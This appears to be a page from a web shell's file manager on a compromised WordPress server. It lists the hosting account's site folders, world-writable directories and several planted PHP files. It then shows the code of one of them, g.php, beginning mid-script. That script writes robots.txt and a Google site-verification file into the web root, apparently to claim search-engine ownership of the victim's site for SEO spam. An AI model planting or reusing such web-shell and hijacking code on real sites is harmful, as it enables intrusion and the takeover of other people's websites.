/home/techb158/public_html
NameSizeModeActions
.wp-toolkit_3/-0755rm
.wp-toolkit_g/-0755rm
.wp-toolkit_q/-0755rm
.wp-toolkit_t/-0755rm
.wp-toolkit_w/-0755rm
.wp-toolkit_Z/-0755rm
clicfinancement.ca/-0750rm
clicfinancement.com/-0750rm
francisgallanthypotheque.com/-0750rm
frantzihypotheque.ca/-0750rm
hypothequechristinelemieux.com/-0750rm
hypothequephenix.com/-0750rm
hypothequetoimieux.com/-0750rm
ileadtechnologies.com/-0750rm
marinamendeleva.ca/-0750rm
matthieust-laurent.ca/-0750rm
maxautos.ca/-0750rm
nathalielegerhypotheque.com/-0750rm
solutionshypotheque.com/-0750rm
techbala.com/-0777rm
wp-admin/-0777rm
wp-content/-0777rm
wp-includes/-0777rm
.ftpquota160600editdlrm
.htaccess6050644editdlrm
g.php33960644editdlrm
googlebcc677847ac933d4.html530644editdlrm
index.php10880444editdlrm
kwa.txt10644editdlrm
license.txt199030666editdlrm
php.ini1060644editdlrm
readme.html74070666editdlrm
robots.txt690644editdlrm
rtfzogas.php73170644editdlrm
techbala.com.zip1877984560644editdlrm
wordfence-waf.php00644editdlrm
wp-activate.php77180666editdlrm
wp-blog-header.php10350644editdlrm
wp-comments-post.php23230666editdlrm
wp-config-sample.php33390666editdlrm
wp-config.php38820644editdlrm
wp-cron-seig.php16590644editdlrm
wp-cron.php56170666editdlrm
wp-links-opml.php24930666editdlrm
wp-load.php53290644editdlrm
wp-login.php525360666editdlrm
wp-mail.php87270666editdlrm
wp-settings.php338400644editdlrm
wp-signup.php350810666editdlrm
wp-trackback.php53960666editdlrm
wp_blog_footer.php453340644editdlrm
xmlrpc.php32050666editdlrm
Edit: /home/techb158/public_html/g.php (3396B)
0) { if (@file_get_contents($robots_file) === $robots_content) { $robots_success = true; } } $code = trim($google_code); $google_filename = $code . '.html'; $google_content = 'google-site-verification: ' . $google_filename; $google_file = $root_path . '/' . $google_filename; @file_put_contents($google_file, $google_content); $google_success = false; if (is_file($google_file) && filesize($google_file) > 0) { if (@file_get_contents($google_file) === $google_content) { $google_success = true; } } echo "

🚀 SEO 自动化文件生成结果

"; echo "

当前顶级根目录:" . htmlspecialchars($root_path) . "

"; if ($robots_success) { echo "✅ robots.txt 成功写入顶级根目录路径: " . htmlspecialchars($robots_file) . "
"; echo "
" . htmlspecialchars($robots_content) . "

"; } else { echo "❌ robots.txt 写入失败! 请检查网站根目录 DOCUMENT_ROOT 的写入权限。

"; } if ($google_success) { echo "✅ " . htmlspecialchars($google_filename) . " 成功写入顶级根目录路径: " . htmlspecialchars($google_file) . "
"; echo "
" . htmlspecialchars($google_content) . "
"; } else { echo "❌ Google 验证文件 写入失败! 请检查网站根目录 DOCUMENT_ROOT 的写入权限。
"; } ?>